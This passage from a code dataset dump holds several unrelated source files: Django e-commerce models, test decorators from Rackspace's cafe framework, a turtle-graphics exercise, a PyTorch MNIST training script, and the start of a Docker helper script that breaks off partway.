\"-\" + instance.title)\n\n\npre_save.connect(pre_save_product_post_receiever, sender=Product)\n\n\nclass Review(models.Model):\n RATING_CHOICES = (\n (1, '1'),\n (2, '2'),\n (3, '3'),\n (4, '4'),\n (5, '5'),\n )\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n pub_date = models.DateTimeField('date published')\n user_name = models.CharField(max_length=100)\n comment = models.CharField(max_length=200)\n rating = models.IntegerField(\n choices=RATING_CHOICES)\n\n\nclass Order(models.Model):\n STATUS = (\n ('Pending', 'Pending'),\n ('Delivered', 'Delivered'),\n )\n STATUSFORBUYER = (\n ('Not-Received', 'Not-Received'),\n ('Received', 'Received'),\n )\n user = models.ForeignKey(\n User, on_delete=models.CASCADE, blank=True, null=True)\n date_orderd = models.DateTimeField(auto_now_add=True)\n complete = models.BooleanField(default=False, null=True, blank=False)\n transaction_id = models.CharField(max_length=200, null=True)\n status = models.CharField(\n max_length=200, null=True, blank=True, choices=STATUS, default='Pending')\n statusforbuyer = models.CharField(\n max_length=200, null=True, blank=True, choices=STATUSFORBUYER, default='Not-Received')\n\n def __str__(self):\n return str(self.id)\n\n @property\n def get_cart_total(self):\n orderitem = self.orderitem_set.all()\n total = sum(item.get_total for item in orderitem)\n return total\n\n @property\n def get_deal_cart_total(self):\n orderitem = self.orderitem_set.all()\n total = sum(item.get_deal_total for item in orderitem)\n return total\n\n @property\n def get_cart_items(self):\n orderitem = self.orderitem_set.all()\n total = sum(item.quantity for item in orderitem)\n return total\n\n\nclass OrderItem(models.Model):\n STATUS = (\n ('0', '0'),\n ('1', '1'),\n )\n STATUSFORSELLER = (\n ('Pending', 'Pending'),\n ('Delivered', 'Delivered'),\n )\n STATUSFORBUYER = (\n ('Not-Received', 'Not-Received'),\n ('Received', 'Received'),\n )\n product = models.ForeignKey(\n Product, on_delete=models.CASCADE, blank=True, null=True)\n order = models.ForeignKey(\n Order, on_delete=models.SET_NULL, blank=True, null=True)\n quantity = models.IntegerField(default=0, null=True, blank=True)\n date_orderd = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(\n User, on_delete=models.SET_NULL, blank=True, null=True)\n price = models.FloatField(blank=True, null=True)\n feedback_status = models.CharField(\n max_length=200, null=True, blank=True, choices=STATUS)\n status = models.CharField(\n max_length=200, null=True, blank=True, choices=STATUSFORSELLER, default='Pending')\n statusforbuyer = models.CharField(\n max_length=200, null=True, blank=True, choices=STATUSFORBUYER, default='Not-Received')\n\n def __str__(self):\n return str(self.product)\n\n @property\n def get_total(self):\n price = self.product.price\n quantity = self.quantity\n total = price*quantity\n print(total)\n\n return total\n\n @property\n def get_deal_total(self):\n price = self.product.deal_price\n quantity = self.quantity\n total = price*quantity\n print(total)\n\n return total\n\n\nclass ShippingAddress(models.Model):\n user = models.ForeignKey(\n User, on_delete=models.CASCADE, blank=True, null=True)\n order = models.ForeignKey(\n Order, on_delete=models.CASCADE, blank=True, null=True)\n name = models.CharField(max_length=150)\n address = models.CharField(max_length=150)\n city = models.CharField(max_length=150)\n state = models.CharField(max_length=150)\n zipcode = models.CharField(max_length=150)\n date_orderd = models.DateTimeField(auto_now_add=True)\n ph_number = models.CharField(\n validators=[MinLengthValidator(11)], max_length=11)\n\n def __str__(self):\n return self.address\n\n\nclass Wishlist(models.Model):\n # here CASCADE is the behavior to adopt when the referenced object(because it is a foreign key) is deleted. it is not specific to django,this is an sql standard.\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n wished_item = models.ForeignKey(Product, on_delete=models.CASCADE)\n added_date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.wished_item.title\n","sub_path":"products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"372837796","text":"\"\"\"\nCopyright 2013 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport collections\nimport inspect\nimport itertools\n\nfrom types import FunctionType\nfrom unittest import TestCase\nfrom warnings import warn, simplefilter\n\nfrom cafe.common.reporting import cclogging\n\nTAGS_DECORATOR_TAG_LIST_NAME = \"__test_tags__\"\nTAGS_DECORATOR_ATTR_DICT_NAME = \"__test_attrs__\"\nDATA_DRIVEN_TEST_ATTR = \"__data_driven_test_data__\"\nDATA_DRIVEN_TEST_PREFIX = \"ddtest_\"\n\n\nclass DataDrivenFixtureError(Exception):\n pass\n\n\ndef tags(*tags, **attrs):\n \"\"\"Adds tags and attributes to tests, which are interpreted by the\n cafe-runner at run time\n \"\"\"\n def decorator(func):\n setattr(func, TAGS_DECORATOR_TAG_LIST_NAME, [])\n setattr(func, TAGS_DECORATOR_ATTR_DICT_NAME, {})\n func.__test_tags__.extend(tags)\n func.__test_attrs__.update(attrs)\n return func\n return decorator\n\n\ndef data_driven_test(*dataset_sources, **kwargs):\n \"\"\"Used to define the data source for a data driven test in a\n DataDrivenFixture decorated Unittest TestCase class\"\"\"\n\n def decorator(func):\n # dataset_source checked for backward compatibility\n combined_lists = kwargs.get(\"dataset_source\") or []\n for list_ in dataset_sources:\n combined_lists += list_\n setattr(func, DATA_DRIVEN_TEST_ATTR, combined_lists)\n return func\n return decorator\n\n\ndef DataDrivenFixture(cls):\n \"\"\"Generates new unittest test methods from methods defined in the\n decorated class\"\"\"\n\n if not issubclass(cls, TestCase):\n raise DataDrivenFixtureError\n\n test_case_attrs = dir(cls)\n for attr_name in test_case_attrs:\n if attr_name.startswith(DATA_DRIVEN_TEST_PREFIX) is False:\n # Not a data driven test, skip it\n continue\n\n original_test = getattr(cls, attr_name, None).__func__\n test_data = getattr(original_test, DATA_DRIVEN_TEST_ATTR, None)\n\n if test_data is None:\n # no data was provided to the datasource decorator or this is not a\n # data driven test, skip it.\n continue\n\n for dataset in test_data:\n # Name the new test based on original and dataset names\n base_test_name = str(original_test.__name__)[\n int(len(DATA_DRIVEN_TEST_PREFIX)):]\n new_test_name = \"test_{0}_{1}\".format(\n base_test_name, dataset.name)\n\n # Create a new test from the old test\n new_test = FunctionType(\n original_test.func_code, original_test.func_globals,\n name=new_test_name)\n\n # Copy over any other attributes the original test had (mainly to\n # support test tag decorator)\n for attr in list(set(dir(original_test)) - set(dir(new_test))):\n setattr(new_test, attr, getattr(original_test, attr))\n\n # Change the new test's default keyword values to the appropriate\n # new data as defined by the datasource decorator\n args, _, _, defaults = inspect.getargspec(original_test)\n\n # Self doesn't have a default, so we need to remove it\n args.remove('self')\n\n # Make sure we take into account required arguments\n kwargs = dict(\n itertools.izip_longest(\n args[::-1], list(defaults or ())[::-1], fillvalue=None))\n\n kwargs.update(dataset.data)\n\n # Make sure the updated values are in the correct order\n new_default_values = [kwargs[arg] for arg in args]\n setattr(new_test, \"func_defaults\", tuple(new_default_values))\n\n # Add the new test to the decorated TestCase\n setattr(cls, new_test_name, new_test)\n return cls\n\n\ndef skip_open_issue(type, bug_id):\n simplefilter('default', DeprecationWarning)\n warn('cafe.drivers.unittest.decorators.skip_open_issue() has been moved '\n 'to cafe.drivers.unittest.issue.skip_open_issue()',\n DeprecationWarning)\n\n try:\n from cafe.drivers.unittest.issue import skip_open_issue as skip_issue\n return skip_issue(type, bug_id)\n except ImportError:\n print ('* Skip on issue plugin is not installed. Please install '\n 'the plugin to use this functionality')\n return lambda obj: obj\n\n\nclass memoized(object):\n\n \"\"\"\n Decorator.\n @see: https://wiki.python.org/moin/PythonDecoratorLibrary#Memoize\n Caches a function's return value each time it is called.\n If called later with the same arguments, the cached value is returned\n (not reevaluated).\n\n Adds and removes handlers to root log for the duration of the function\n call, or logs return of cached result.\n \"\"\"\n\n def __init__(self, func):\n self.func = func\n self.cache = {}\n self.__name__ = func.func_name\n\n def __call__(self, *args):\n log_name = \"{0}.{1}\".format(\n cclogging.get_object_namespace(args[0]), self.__name__)\n self._start_logging(log_name)\n if not isinstance(args, collections.Hashable):\n # uncacheable. a list, for instance.\n # better to not cache than blow up.\n value = self.func(*args)\n self.func._log.debug(\"Uncacheable. Data returned\")\n self._stop_logging()\n return value\n\n if args in self.cache:\n self.func._log.debug(\"Cached data returned.\")\n self._stop_logging()\n return self.cache[args]\n\n else:\n value = self.func(*args)\n self.cache[args] = value\n self.func._log.debug(\"Data cached for future calls\")\n self._stop_logging()\n return value\n\n def __repr__(self):\n \"\"\"Return the function's docstring.\"\"\"\n return self.func.__doc__\n\n def _start_logging(self, log_file_name):\n setattr(self.func, '_log_handler', cclogging.setup_new_cchandler(\n log_file_name))\n setattr(self.func, '_log', cclogging.getLogger(''))\n self.func._log.addHandler(self.func._log_handler)\n try:\n curframe = inspect.currentframe()\n self.func._log.debug(\"{0} called from {1}\".format(\n self.__name__, inspect.getouterframes(curframe, 2)[2][3]))\n except:\n self.func._log.debug(\n \"Unable to log where {0} was called from\".format(\n self.__name__))\n\n def _stop_logging(self):\n self.func._log.removeHandler(self.func._log_handler)\n","sub_path":"cafe/drivers/unittest/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"620202196","text":"# a201 name : eegbunam iu username : ebuka egbunam\n\nimport turtle\nfrom turtle import *\negb = turtle.Turtle()\negb.penup()\n\ndef draw(pX , pY , pColor):\n ''' takes pX, pY, and pColor, to draws a colored point at integer coordinates (pX,pY)\n number , number , string -> turtle points '''\n\n# no need to assign to result but i decided to because it makes it clearer for me \n result = egb.goto( pX , pY )\n result = egb.dot( 4, pColor)\n return result\n\n\n\n# uses the draw function to draw points \ndraw(30 , 100 , \"green\")\n\ndraw(200 , 200 , \"red\")\n\n\n\n\n \n \n","sub_path":"pa-11-points 2.01.58 AM.py","file_name":"pa-11-points 2.01.58 AM.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"79778762","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.optim.lr_scheduler import StepLR\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport PIL\nimport pickle\n\n\nimport sklearn\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.manifold import TSNE\nimport seaborn as sn\nimport pandas as pd\nfrom math import log\nimport math\n\n\nrandom.seed(2020)\ntorch.manual_seed(2020)\n\n\nimport os\n\n'''\nThis code is adapted from two sources:\n(i) The official PyTorch MNIST example (https://github.com/pytorch/examples/blob/master/mnist/main.py)\n(ii) Starter code from Yisong Yue's CS 155 Course (http://www.yisongyue.com/courses/cs155/2020_winter/)\n'''\n\nclass fcNet(nn.Module):\n '''\n Design your model with fully connected layers (convolutional layers are not\n allowed here). Initial model is designed to have a poor performance. These\n are the sample units you can try:\n Linear, Dropout, activation layers (ReLU, softmax)\n '''\n def __init__(self):\n # Define the units that you will use in your model\n # Note that this has nothing to do with the order in which operations\n # are applied - that is defined in the forward function below.\n super(fcNet, self).__init__()\n self.fc1 = nn.Linear(in_features=784, out_features=20)\n self.fc2 = nn.Linear(20, 10)\n self.dropout1 = nn.Dropout(p=0.5)\n\n def forward(self, x):\n # Define the sequence of operations your model will apply to an input x\n x = torch.flatten(x, start_dim=1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout1(x)\n x = F.relu(x)\n\n output = F.log_softmax(x, dim=1)\n return output\n\nclass ConvNet(nn.Module):\n '''\n Design your model with convolutional layers.\n '''\n def __init__(self):\n super(ConvNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=8, kernel_size=(3,3), stride=1)\n self.conv2 = nn.Conv2d(8, 8, 3, 1)\n self.dropout1 = nn.Dropout2d(0.5)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(200, 64)\n self.fc2 = nn.Linear(64, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout2(x)\n\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n\n output = F.log_softmax(x, dim=1)\n return output\n\n'''\nclass ConvNet(nn.Module):\n\n def __init__(self):\n super(ConvNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=8, kernel_size=(3,3), stride=1)\n self.conv2 = nn.Conv2d(8, 8, 3, 1)\n self.dropout1 = nn.Dropout2d(0.5)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(200, 64)\n self.fc2 = nn.Linear(64, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout2(x)\n\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n\n output = F.log_softmax(x, dim=1)\n return output\n'''\n\n\nclass Net(nn.Module):\n '''\n COmpared with teh convnet, this has a 3rd linear layer and doubles the number of the convolution in the 2nd convolution layer\n '''\n\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, out_channels=8, kernel_size=(3, 3), stride=1)\n self.conv15 = nn.Conv2d(8, out_channels=16, kernel_size=(3, 3), stride=1)\n #self.conv2 = nn.Conv2d(8, 16, 3, 1)\n self.conv2 = nn.Conv2d(16, 32, 3, 1)\n\n #self.dropout1 = nn.Dropout2d(0.5)\n #self.dropout2 = nn.Dropout2d(0.5)\n\n # follow dimensions:\n # conv1 takes 28 to 26\n # maxpool takes 26 to 13\n # conv2 takes 13 to 11\n # maxpool takes 11 to 5\n\n #self.fc1 = nn.Linear(16 * 5 * 5, 120)\n #self.fc1 = nn.Linear(32 * 4 * 4, 120)\n self.fc1 = nn.Linear(32 * 22 * 22, 3000)\n self.fc15 = nn.Linear(3000, 600)\n self.fc16 = nn.Linear(600, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n self.dropout1 = nn.Dropout2d(0.3)\n self.dropout2 = nn.Dropout2d(0.3)\n\n\n def forward(self, x):\n\n x = self.conv1(x)\n x = F.relu(x)\n #x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n\n x = self.conv15(x)\n x = F.relu(x)\n x = self.dropout2(x)\n #x = F.max_pool2d(x, 2)\n\n x = self.conv2(x)\n x = F.relu(x)\n #x = F.max_pool2d(x, 2)\n\n size = x.size()[1:]\n dims = 1\n for s in size:\n dims *= s\n x = x.view(-1, dims)\n\n x = self.fc1(x)\n x = F.relu(x)\n\n x = self.fc15(x)\n x = F.relu(x)\n\n x = self.fc16(x)\n x = F.relu(x)\n\n x = self.fc2(x)\n x = F.relu(x)\n\n xf = self.fc3(x)\n\n\n output = F.log_softmax(xf, dim=1)\n return output, x\n\n\nclass Net2(nn.Module):\n '''\n COmpared with the convnet, this has a 3rd linear layer and doubles the number of the convolution in the 2nd convolution layer\n '''\n\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, out_channels=8, kernel_size=(3, 3), stride=1)\n self.conv15 = nn.Conv2d(8, out_channels=16, kernel_size=(3, 3), stride=1)\n #self.conv2 = nn.Conv2d(8, 16, 3, 1)\n self.conv2 = nn.Conv2d(16, 32, 3, 1)\n\n #self.dropout1 = nn.Dropout2d(0.5)\n #self.dropout2 = nn.Dropout2d(0.5)\n\n # follow dimensions:\n # conv1 takes 28 to 26\n # maxpool takes 26 to 13\n # conv2 takes 13 to 11\n # maxpool takes 11 to 5\n\n #self.fc1 = nn.Linear(16 * 5 * 5, 120)\n #self.fc1 = nn.Linear(32 * 4 * 4, 120)\n self.fc1 = nn.Linear(32 * 22 * 22, 3000)\n self.fc15 = nn.Linear(3000, 600)\n self.fc16 = nn.Linear(600, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n self.dropout1 = nn.Dropout2d(0.2)\n self.dropout2 = nn.Dropout2d(0.2)\n\n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n def forward(self, x):\n\n x = self.conv1(x)\n x = F.relu(x)\n #x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n\n x = self.conv15(x)\n x = F.relu(x)\n x = self.dropout2(x)\n #x = F.max_pool2d(x, 2)\n\n x = self.conv2(x)\n x = F.relu(x)\n #x = F.max_pool2d(x, 2)\n\n size = x.size()[1:]\n dims = 1\n for s in size:\n dims *= s\n x = x.view(-1, dims)\n\n x = self.fc1(x)\n x = F.relu(x)\n\n x = self.fc15(x)\n x = F.relu(x)\n\n x = self.fc16(x)\n x = F.relu(x)\n\n x = self.fc2(x)\n x = F.relu(x)\n\n\n\n xf = self.fc3(x)\n\n\n output = F.log_softmax(xf, dim=1)\n return output, x\n\ndef train(args, model, device, train_loader, optimizer, epoch):\n '''\n This is your training function. When you call this function, the model is\n trained for 1 epoch.\n '''\n model.train() # Set the model to training mode\n total_loss = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad() # Clear the gradient\n output, hidden_layer = model(data) # Make predictions\n loss = F.nll_loss(output, target) # Compute loss\n loss.backward() # Gradient computation\n optimizer.step() # Perform a single optimization step\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.sampler),\n 100. * batch_idx / len(train_loader), loss.item()))\n\n total_loss = total_loss + loss.item()\n #train loss for each epoch is an average of the loss over all mini-batches\n train_loss = total_loss/batch_idx\n\n return train_loss\n\n\ndef test(model, device, test_loader, evaluate = False):\n model.eval() # Set the model to inference mode\n test_loss = 0\n correct = 0\n test_num = 0\n\n images = []\n allimages = []\n master_preds = []\n master_truths = []\n master_hidden_layers = []\n with torch.no_grad(): # For the inference step, gradient is not computed\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output, hidden_layer = model(data)\n\n #feature_extractor = torch.nn.Sequential(*list(model.children())[:-1])\n\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n\n print(len(hidden_layer))\n print(len(hidden_layer[0]))\n #print(hidden_layer[0])\n\n\n correct += pred.eq(target.view_as(pred)).sum().item()\n test_num += len(data)\n\n\n if evaluate:\n for i in range(len(pred)):\n master_preds.append(pred[i][0].item())\n master_truths.append(target[i].item())\n layer = hidden_layer[i].cpu()\n master_hidden_layers.append(layer.numpy())\n image = data[i][0].cpu()\n allimages.append(image.numpy())\n if pred[i][0] == target[i]:\n continue\n else:\n #print(\"not equal\")\n #print(\"pred is \", pred[i][0].item(), \"and target is \", target[i].item())\n image = data[i][0].cpu()\n images.append([image.numpy(),pred[i][0].item(),target[i].item()])\n\n if evaluate:\n\n #print(len(master_hidden_layers))\n #print(master_hidden_layers[0])\n\n distances = np.zeros(len(master_hidden_layers))\n\n #x0 = master_hidden_layers[0]\n\n for i in range(len(distances)):\n length = 0\n for dim in range(len(master_hidden_layers[0])):\n length = length + (master_hidden_layers[i][dim] - master_hidden_layers[15][dim])**2\n length = math.sqrt(length)\n distances[i] = length\n\n sorted_distance_index = np.argsort(distances)\n\n figa = plt.figure()\n\n\n print(\"test\")\n for i in range(9):\n sub = figa.add_subplot(9, 1, i + 1)\n sub.imshow(allimages[sorted_distance_index[i]], interpolation='nearest', cmap='gray')\n\n X = master_hidden_layers\n y = np.array(master_truths)\n tsne = TSNE(n_components=2, random_state=0)\n X_2d = np.array(tsne.fit_transform(X))\n\n target_ids = range(10)\n\n cdict = {0: 'orange', 1: 'red', 2: 'blue', 3: 'green', 4: 'salmon', 5:'c', 6: 'm', 7: 'y', 8: 'k', 9: 'lime'}\n\n fig, ax = plt.subplots()\n for g in np.unique(y):\n ix = np.where(y == g)\n ax.scatter(X_2d[ix, 0], X_2d[ix, 1], c=cdict[g], label=g, s=5)\n ax.legend()\n plt.show()\n\n\n #i = 1\n #plt.figure(figsize=(6, 5))\n #plt.scatter(X_2d[10*i:10*i+10,0],X_2d[:10,1])\n\n\n\n CM = confusion_matrix(master_truths,master_preds)\n CMex = CM\n #for i in range(len(CM)):\n # for j in range(len(CM)):\n # if CM[i][j] > 0:\n # CMex[i][j] = log(CM[i][j])\n # else:\n # CMex[i][j] = CM[i][j]\n\n print(CM)\n print(CMex)\n\n df_cm = pd.DataFrame(CM, range(10), range(10))\n #plt.figure(figsize=(10,7))\n fig0,ax0 = plt.subplots(1)\n sn.set(font_scale=1) # for label size\n sn.heatmap(df_cm, annot=True, annot_kws={\"size\": 11}) # font size\n #ax0.set_ylim(len(CMex) - 0.5, 0.5)\n plt.xlabel(\"predicted\")\n plt.ylabel(\"ground truth\")\n plt.show()\n\n\n\n\n fig = plt.figure()\n\n for i in range(9):\n sub = fig.add_subplot(3, 3, i + 1)\n sub.imshow(images[i + 10][0], interpolation='nearest', cmap='gray')\n\n title = \"Predicted: \" + str(images[i+ 10][1]) + \" True: \" + str(images[i+ 10][2])\n sub.set_title(title)\n\n kernels = model.conv1.weight.cpu().detach().clone()\n kernels = kernels - kernels.min()\n kernels = kernels / kernels.max()\n\n kernels = kernels.numpy()\n print(np.shape(kernels))\n\n fig2 = plt.figure()\n for i in range(8):\n\n sub = fig2.add_subplot(2, 4, i + 1)\n sub.imshow(kernels[i][0], interpolation='nearest', cmap='gray')\n\n title = \"Kernel #\" + str(i + 1)\n sub.set_title(title)\n\n\n #fig, axs = plt.subplots(3, 3, constrained_layout=True)\n #for i in range(9):\n # fig[i].imshow(images[i][0], interpolation='nearest', cmap='gray')\n # axs[i].set_title(\"all titles\")\n\n\n\n\n\n test_loss /= test_num\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\\n'.format(\n test_loss, correct, test_num,\n 100. * correct / test_num))\n\n return test_loss\n\n\ndef main():\n # Training settings\n # Use the command line to modify the default settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--batch-size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--epochs', type=int, default=14, metavar='N',\n help='number of epochs to train (default: 14)')\n parser.add_argument('--lr', type=float, default=1.0, metavar='LR',\n help='learning rate (default: 1.0)')\n parser.add_argument('--step', type=int, default=1, metavar='N',\n help='number of epochs between learning rate reductions (default: 1)')\n parser.add_argument('--gamma', type=float, default=0.7, metavar='M',\n help='Learning rate step gamma (default: 0.7)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n\n parser.add_argument('--evaluate', action='store_true', default=False,\n help='evaluate your model on the official test set')\n parser.add_argument('--load-model', type=str,\n help='model file path')\n\n parser.add_argument('--save-model', action='store_true', default=True,\n help='For Saving the current Model')\n args = parser.parse_args()\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n # Evaluate on the official test set\n if args.evaluate:\n assert os.path.exists(args.load_model)\n\n # Set the test model\n model = Net().to(device)\n model.load_state_dict(torch.load(args.load_model))\n\n test_dataset = datasets.MNIST('../data', train=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n\n test_loader = torch.utils.data.DataLoader(\n test_dataset, batch_size=args.test_batch_size, shuffle=True, **kwargs)\n\n test(model, device, test_loader, evaluate = True)\n\n return\n\n # Pytorch has default MNIST dataloader which loads data at each iteration\n train_dataset = datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([ # Data preprocessing\n transforms.ToTensor(), # Add data augmentation here\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n\n train_dataset_augmented = datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([ # Data preprocessing\n #transforms.RandomCrop(28, padding=(1, 1, 1, 1)),\n #transforms.RandomRotation(4, resample=PIL.Image.BILINEAR),\n #transforms.RandomResizedCrop(28, scale=(0.85, 1.0), ratio=(1, 1),\n # interpolation=2),\n transforms.RandomAffine(8, translate=(.065, .065), scale=(0.80, 1.1),\n resample=PIL.Image.BILINEAR),\n transforms.ToTensor(), # Add data augmentation here\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n\n print(type(train_dataset))\n print(len(train_dataset), type(train_dataset[0][0]), type(train_dataset[0][1]), type(train_dataset[0]))\n\n print(\"the int is: \", train_dataset[2][1])\n print(np.shape(train_dataset[0][0][0].numpy()))\n\n idx = [[] for i in range(10)]\n #each row of indexes is a list of indexes in the train_dataset\n #e.g. row 5 containes a list of indexes for the places in train_dataset with images of 5\n print(idx[4])\n for i, img in enumerate(train_dataset):\n\n #if False:\n if i < 5:\n fig = plt.figure()\n plt.imshow(img[0][0].numpy(), cmap='gray')\n\n fig = plt.figure()\n plt.imshow(train_dataset_augmented[i][0][0].numpy(), cmap='gray')\n\n for number in range(10):\n if img[1] == number:\n idx[number].append(i)\n\n\n val_idx = [[] for i in range(10)]\n train_idx = [[] for i in range(10)]\n #print(idx[0][1:100])\n\n for i, number_indx in enumerate(idx):\n random.shuffle(number_indx)\n l = len(number_indx)\n idx_lim = int(l*0.15)\n val_idx[i] = number_indx[0:idx_lim]\n train_idx[i] = number_indx[idx_lim:]\n\n\n subset_indices_train = [j for sub in train_idx for j in sub]\n subset_indices_valid = [j for sub in val_idx for j in sub]\n\n\n # for adjusting size of train set\n\n train_length = int(len(subset_indices_train))\n #train_length = int(len(subset_indices_train)/2)\n #train_length = int(len(subset_indices_train) / 4)\n #train_length = int(len(subset_indices_train) / 8)\n #train_length = int(len(subset_indices_train) / 16)\n\n\n\n\n # You can assign indices for training/validation or use a random subset for\n # training by using SubsetRandomSampler. Right now the train and validation\n # sets are built from the same indices - this is bad! Change it so that\n # the training and validation sets are disjoint and have the correct relative sizes.\n\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset_augmented, batch_size=args.batch_size,\n sampler=SubsetRandomSampler(subset_indices_train[:train_length])\n )\n val_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.test_batch_size,\n sampler=SubsetRandomSampler(subset_indices_valid)\n )\n\n # Load your model [fcNet, ConvNet, Net]\n model = Net().to(device)\n\n # Try different optimzers here [Adam, SGD, RMSprop]\n optimizer = optim.Adadelta(model.parameters(), lr=args.lr)\n\n\n # Set your learning rate scheduler\n scheduler = StepLR(optimizer, step_size=args.step, gamma=args.gamma)\n\n # Training loop\n train_losses = []\n test_losses = []\n x = []\n fig, ax = plt.subplots(1)\n\n\n if True:\n for epoch in range(1, args.epochs + 1):\n #train and test each epoch\n train_loss = train(args, model, device, train_loader, optimizer, epoch)\n test_loss = test(model, device, val_loader)\n scheduler.step() # learning rate scheduler\n\n train_losses.append(train_loss)\n test_losses.append(test_loss)\n x.append(epoch - 1)\n ax.plot(x, test_losses, label='test_losses', markersize=2)\n ax.plot(x, train_losses, label='train_losses', markersize=2)\n\n plt.pause(0.05)\n\n # You may optionally save your model at each epoch here\n\n if args.save_model:\n\n print(train_losses)\n with open(\"train_losses_one.txt\", \"wb\") as fp: # Pickling\n pickle.dump(train_losses, fp)\n print(test_losses)\n with open(\"test_losses_one.txt\", \"wb\") as fp: # Pickling\n pickle.dump(test_losses, fp)\n\n\n\n torch.save(model.state_dict(), \"mnist_model_onef.pt\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"539417910","text":"import subprocess as sp\n\ndef installDocker():\n sp.run(\"yum install docker-ce --nobest -y\", shell=True)\n\ndef startDocker():\n sp.run(\"systemctl start docker\",shell=True)\n\ndef dockerCommands():\n ch = 'Y'\n cnt = 0\n while ch =='Y':\n if cnt == 0:\n ans = input(\"would you like to play with containers?[Y/N]\")\n if ans == 'Y':\n print(\"CHOOSE OPERATION: \")\n print(\" 1 : RUN \")\n print(\" 2 : STOP\")\n print(\" 3 : REMOVE CONTAINER\")\n print(\" 4 : REMOVE IMAGE\")\n print(\" 5 : PULL IMAGE\")\n print(\" 6 : Exit\")\n opt = int(input())\n if opt == 1:\n name = input(\"GIVE NAME TO YOUR CONTIANER: \")\n term = input(\"WOULD YOU LIKE TO GET INTERACTIVE TERMINAL OR CLOSE CONT AFTER RUNNING?[Y/N]\")\n image = input(\"IMAGE NAME : \")\n cont_run = sp.getoutput(\"docker run -dit --name {} {}\".format(name, image))\n print(cont_run)\n op_of_cont = sp.getoutput(\"docker ps\")\n print(op_of_cont)\n elif opt == 2:\n all_cont = 